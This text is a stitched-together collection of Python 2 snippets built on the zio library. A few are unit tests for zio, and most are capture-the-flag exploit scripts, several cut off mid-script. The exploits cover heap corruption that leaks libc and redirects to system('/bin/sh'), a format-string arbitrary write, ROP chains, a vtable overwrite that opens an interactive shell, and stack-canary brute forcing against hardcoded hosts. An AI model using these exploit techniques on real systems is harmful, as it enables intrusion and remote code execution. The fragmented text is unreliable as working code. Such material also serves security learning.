def test_tty_raw_out(self): s = [] ans = [] for i in range(10): r = random.randint(0,1) s.append('%d%s' % (i, r and '\\r\\n' or '\\n')) ans.append('%d%s' % (i, r and '\r\n' or '\n')) ans = ''.join(ans) cmd = "printf '" + ''.join(s) + "'" io = zio(cmd, stdout = TTY_RAW) rd = io.read() io.close() self.assertEqual(rd, ans) unprintable = [chr(c) for c in range(256) if chr(c) not in string.printable] for i in range(10): random.shuffle(unprintable) from zio import which py = which('python2') or which('python') self.assertNotEqual(py, None) io = zio(' '.join([py, '-u', os.path.join(os.path.dirname(sys.argv[0]), 'myprintf.py'), "'\\r\\n" + repr(''.join(unprintable))[1:-1] + "\\n'"]), stdout = TTY_RAW, print_read = COLORED(REPR)) rd = io.read() self.assertEqual(rd, "\r\n" + ''.join(unprintable) + "\n")
def exp2(target): io = zio(target, timeout=30, print_read=COLORED(RAW, 'red'), \ print_write=COLORED(RAW, 'green')) add(io, 20, 8, 'a' * 0xa0) add(io, 20, 8, 'a' * 0xa0) add(io, 20, 8, 'a' * 0xa0) delete(io, 0) delete(io, 1) add(io, 7, 8, "") for i in range(7): print i, hex(l64(show_row(io, 0, i))) heap_base = l64(show_row(io, 0, 1)) - 0x50 main_base = l64(show_row(io, 0, 2)) - 0xb80 print hex(heap_base), hex(main_base) delete(io, 0) add(io, 20, 8, "") libc_base = (l64(show_row(io, 0, 0))) - 0x3c4b78 print hex(libc_base) system = libc_base + 0x0000000000045390 delete(io, 0) add(io, 18, 8, '') d1 = l64('/bin/sh;') - 0x0000000800000014 d = l64(d1) for i in range(8): val = ord(l64(system)[i]) - ord(l64(main_base + 0xcc0)[i]) if val < 0: val += 0x100 d += chr(val) expand(io, 0, 0x20000002, d) add_row(io, 0, 22, 18) add_row(io, 0, 25, 19) payload = l32(0xdeadfafa) + l8(3) + l32(2) + l32(0) io.write(payload) io.writeline('./bin/cat flag/flag') flag = io.readline()[:-1].strip() print target print 'flag', flag submit_flag(flag) io.close()
def exp(target): # io = zio(target, timeout=10000, print_read=COLORED(REPR, 'red'), print_write=COLORED(REPR, 'green')) io = zio(target, timeout=10000, print_read=COLORED(RAW, "red"), print_write=COLORED(RAW, "green")) io.writeline("%17$p") argv0 = int(io.readline().strip("\n"), 16) io.writeline("%49$p") path = int(io.readline().strip("\n"), 16) print hex(path) path = (path + 3) / 4 * 4 print hex(path) index3 = (path - argv0) / 4 + 49 # not need io.writeline("%49$s") print HEX(io.readline().strip("\n")) # not need io.writeline("%%%d$p" % index3) io.readline() addr = 0x0804A01C value = 0x41424344 for i in range(4): do_fmt(io, "%%%dc%%17$hhn" % ((path + i) & 0xFF)) k = (addr >> (i * 8)) & 0xFF if k != 0: do_fmt(io, "%%%dc%%49$hhn" % k) else: do_fmt(io, "%%49$hhn") do_fmt(io, "%%%dc%%17$hhn" % (path & 0xFF)) for i in range(4): do_fmt(io, "%%%dc%%49$hhn" % ((addr + i) & 0xFF)) k = (value >> (i * 8)) & 0xFF if k != 0: do_fmt(io, "%%%dc%%%d$hhn" % (k, index3)) else: do_fmt(io, "%%%d$hhn" % index3) io.gdb_hint() io.interact()
def test_attach_socket(self): print '' for _ in range(4): port = random.randint(31337, 65530) p = subprocess.Popen(['socat', 'TCP-LISTEN:%d,crlf' % port, 'SYSTEM:"echo HTTP/1.0 200; echo Content-Type\: text/plain; echo; echo Hello, zio;"']) time.sleep(0.2) if p.returncode: continue try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.1', port)) line = '' while True: c = s.recv(1) if not c: break else: line += c if line.find('\n') > -1: break assert line.rstrip() == "HTTP/1.0 200", repr(line) io = zio(s) line = io.readline() self.assertEqual(line.rstrip(), "Content-Type: text/plain", repr(line)) line = io.readline() line = io.readline() self.assertEqual(line.rstrip(), "Hello, zio", repr(line)) io.end() io.close() except socket.error: continue p.terminate() for _ in range(10): r = p.poll() if r is not None: break time.sleep(0.2) else: try: p.kill() except: pass break
def a_byte(num): global payload address = 0 #while address <= 255: for address in range(256): io = zio((ip, port), timeout = 3, print_write = COLORED(REPR)) time.sleep(2) io.read_until('>') io.write('4') io.read_until('(y/n) ') io.write(payload + chr(address)) try: io.readline() data = io.readline() if data != '': payload += chr(address) result = my_hex(address) return result address += 1 except TIMEOUT: io.close() continue
from zio import * import random target = ("pwnable.kr", 9009) io = zio(target, timeout = 9999) io.read_until("(Y/N)\n") io.write("Y\n") io.read_until("Choice: ") io.write("1\n") def read_timeout(io, timeout = 9999): while True: data = io.read_timeout(timeout) if data.strip() != '': continue else: return data def get_status(data): pos_s = data.find("Your Total is ") + len("Your Total is ") pos_e = data.find("\n", pos_s) my_value = int(data[pos_s:pos_e]) pos_s = data.find("The Dealer Has a Total of ") + len("The Dealer Has a Total of ") pos_e = data.find("\n", pos_s) dealer_value = int(data[pos_s:pos_e]) return my_value, dealer_value
def get_io(target): read_mode = COLORED(RAW, "green") write_mode = COLORED(RAW, "blue") io = zio(target, timeout = 9999)#, print_read = read_mode, print_write = write_mode) return io
#!/usr/bin/python2.7 # -*- coding: utf-8 -*- ''' Created on 2014年11月29日 @author: yf ''' from zio import * import re import time io = zio('./qoobee4')#, print_write=False, print_read=False) # io = zio(('10.11.12.13',1415), print_write=False, print_read=False) lose_dic = ['scissor','rock','paper'] right_dic = ['paper', 'scissor','rock'] divset = [17, 16, 18, 19, 21, 22,23,24,25,26,27,28,29,30, 32 , 33 , 34 , 35 , 35 , 36 , 37 , 38 , 39 , 40] rightset = [] flag = '' def losenum(modnum): return (modnum-1+3)%3 # def testdiv(modnum): # # while True: # io.read_until('Your Choice: ') # io.writeline('7') # io.read_until('Select one:') # io.writeline('%d' % losenum(modnum)) # io.read_until('number(0-100)? ')
#!/usr/bin/env python # -*- coding: utf-8 -*- from zio import * ip = '210.61.8.96' ip = '10.211.55.48' port = 51342 io = zio((ip, port), timeout = 1000, print_write = COLORED(REPR)) open_plt = 0x8048420 flag = 0x80487D0 read_plt = 0x80483E0 buf = 0x0804A0A1 write_plt = 0x8048450 read_80_bytes = 0x804865C gadget1 = 0x804879E gadget2 = 0x804879D pivot = 0x804867D payload = "" payload += '\x00'*108 payload += l32(read_80_bytes) payload += l32(gadget1) # pop pop ret payload += l32(buf) # read again payload += l32(buf) # ebp <- buf payload += l32(pivot) # mov esp, ebp # fd = open("/home/rsbo/flag", 0); payload += l32(0xdeadbeef) #payload += l32(open_plt) + l32(flag) + l32(0)
from zio import * io = zio("./main", timeout = 9999) io.write("1111\x002222\x003333\n123123") io.interact()
#!/usr/bin/env python2.7 #encoding:utf-8 from zio import * import time target = ('127.0.0.1',9979) target = ('120.55.113.21',4799) io = zio(target,timeout=5,print_read=COLORED(REPR,'cyan'),print_write=COLORED(REPR,'red')) io.writeline('thatsme') io.writeline() time.sleep(0.5) io.writeline('31') io.read_until('吧') io.readline() q = io.readline() q = q[:q.find('sum')-1].strip() smps = {'1*2+3':10,'4-3+7':2,'9*3-5':4,'6+7*8':166,'15+3*8-7':255,'3*8+11+4':316} io.writeline(str(smps[q])) q = io.readline() q = q[:q.find('sum')-1].strip() io.writeline(str(smps[q])) q = io.readline() q = q[:q.find('sum')-1].strip() io.writeline(str(smps[q])) io.writeline() time.sleep(0.5) io.read_until(':)') io.readline() io.readline()
def get_io(target): io = zio(target, timeout = 9999) return io
def get_io(target): r_m = False # COLORED(RAW, "green") w_m = False # COLORED(RAW, "blue") io = zio(target, timeout=5, print_read=r_m, print_write=w_m) return io
#!/usr/bin/env python # -*- coding: utf-8 -*- from zio import * target = ('10.211.55.56', 12345) io = zio(target, timeout=10000, print_read=COLORED(REPR,'yellow'),\ print_write=COLORED(REPR,'blue')) io.read_until('Send block 0\n')
# encoding:utf-8 # 32位无NX, 覆盖BSS段函数指针 from zio import * from pwn import * func = 0x804A160 bss_data = 0x804A060 context(arch='i386', os='linux', log_level='debug') io = zio(('101.200.187.112',9004),timeout = 9999, #io = zio('./pwn1', timeout = 9999, print_read = COLORED(RAW, 'green'), print_write = COLORED(RAW,'blue')) io.read_until(':') #io.gdb_hint(breakpoints= [0x08048600]) ''' Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 2f 2f 73 68 push $0x68732f2f 8048068: 68 2f 62 69 6e push $0x6e69622f 804806d: 89 e3 mov %esp,%ebx 804806f: 89 c1 mov %eax,%ecx
def exploit(host): io = None try: io = zio(host, timeout=1000, print_read=False, print_write=False) if not io: raise Exception except: print "can't caonnect server!" exit(0) def add_TV(name, Season, Rating, intro): assert len(name) < 64 and len(Season) < 16 and len(Rating) < 16 and len(intro) < 128 io.read_until("Your choice?") io.writeline("1") io.writeline(name) io.writeline(Season) io.writeline(Rating) io.writeline(intro) def add_Movie(name, Actors, Rating, intro): assert len(name) < 64 and len(intro) < 128 io.read_until("Your choice?") io.writeline("2") io.writeline(name) io.writeline(Actors) io.writeline(Rating) io.writeline(intro) def remove_obj(name): io.read_until("Your choice?") io.writeline("3") io.writeline(str(name)) def show_all(): io.read_until("Your choice?") io.writeline("4") # leak heap base def leak_heap(): return heap # leak libc base def leak_libc(): return libc def write_TV_Vtable(vtable, mark=";/bin/sh;"): vtable_str = "" vtable_size = 0x60 tv_name = chr(vtable_size + 0x10 + 1) for fn in vtable: vtable_str += l64(fn) vtable_str = vtable_str + "@" * (vtable_size - len(vtable_str) - len(mark)) + mark # print vtable_str assert len(vtable_str) == vtable_size add_TV("00000000", "0", "0", "0" * 0x7F) add_TV("11111111", "0", "0", "0" * 0x7F) add_TV("22222222", "0", "0", "0" * 0x7F) add_TV("33333333", "0", "0", "0" * 0x7F) add_TV("33333333", "0", "0", "0" * 0x7F) remove_obj("22222222") remove_obj("11111111") remove_obj("00000000") remove_obj("33333333") add_Movie("padding", "0" * 0xE0, "1", "0" * 0x7F) # do not remove 'overwriting' add_Movie("overwriting", vtable_str, "1", "1" * 0x7F) # print "TV: {0}'s vtable has been overwrited!".format(tv_name) return tv_name def read_any_where_once(where): p_nullstub = 0x0004012A0 p_printMovieInfo = 0x004011B0 tv_vtable = [p_printMovieInfo, p_nullstub, p_nullstub] tv_name = write_TV_Vtable(vtable=tv_vtable) floatnum = 0x0101010101010101 add_TV("leak_libc", "0", "0", l64(floatnum) + l64(where)) # trigger that tv_name will call p_printMovieInfo to leak info from address:where show_all() io.read_until("Movie <{0}>: ".format(tv_name)) result = io.read_until("actors: ") result = io.readline().strip() result = result.ljust(8, "\x00") value = l64(result[0:8]) return value # leak info got_puts = 0x601C40 puts = read_any_where_once(got_puts) print "[+] puts\t=>\t{0}".format(hex(puts)) libc_base = puts - 0x6FE30 print "[+] libc_base\t=>\t{0}".format(hex(libc_base)) system = libc_base + 0x46640 print "[+] system\t=>\t{0}".format(hex(system)) shot_shell = libc_base + 0x004652C print "[+] shot_shell\t=>\t{0}".format(hex(shot_shell)) # fake vtable p_nullstub = 0x0004012A0 p_printMovieInfo = 0x004011B0 tv_vtable = [shot_shell, shot_shell, shot_shell] tv_name = write_TV_Vtable(tv_vtable) # trigger that tv_name will call shot_shell # remove_obj(tv_name) show_all() print "[+] shell open " io.writeline("id") io.interact()
buf = 0x804a058 pppr = 0x8048c0d ppr = pppr + 1 pr = ppr + 1 recv_line = 0x8048744 send_len = 0x80487cc send_str = 0x8048848 accept_plt = 0x80485c0 accept_got = 0x804a01c accept_addr = 0xf0200 system_addr = 0x3ee80 system_accept_diff = system_addr - accept_addr io = zio(target, print_write=False, print_read=COLORED(REPR, 'red'), timeout=9999999) payload = 'A' * 268 rop_chain = [ # system() buf, 0x44444444, accept_plt, # recv_line(), overwrite accept got accept_got, pr, recv_line, # sendlen(), get the got of accept 4,
#leak canary, rbp, ret_address for x in range(3): byte_by_byte() log("----------result----------", 'blue') log("canary: " + hex(canary_value), 'red') log("save_rbp: " + hex(save_rbp), 'red') log("ret_address: " + hex(ret_address), 'red') #get libc_addr log("----------get libc_addr----------", 'blue') base_addr = ret_address - 0xe15 log("base_addr: " + hex(base_addr), 'red') dprintf_got = 0x202040 log("dprintf_got: " + hex(dprintf_got), 'red') fd = 0x4 io = zio((ip, 1234), timeout = 100000, print_read = REPR, print_write = COLORED(REPR)) payload = "A"*8200 + l64(canary_value) + l64(save_rbp) + l64(base_addr+0xec6) + "A"*8 + l64(0x0) +\ "A"*8 + l64(base_addr+dprintf_got) + "A"*8 + l64(base_addr+dprintf_got) + l64(fd) +\ l64(base_addr+0xeb0) io.write(payload) io.read_until('thanks.\n') dprintf_addr = l64(io.readline().ljust(8, '\x00')) log("dprintf_addr: " + hex(dprintf_addr), 'red') # # local # dprintf_offset = 0x4E640 # system_offset = 0x3FF80 # binsh_offset = 0x14C28D #server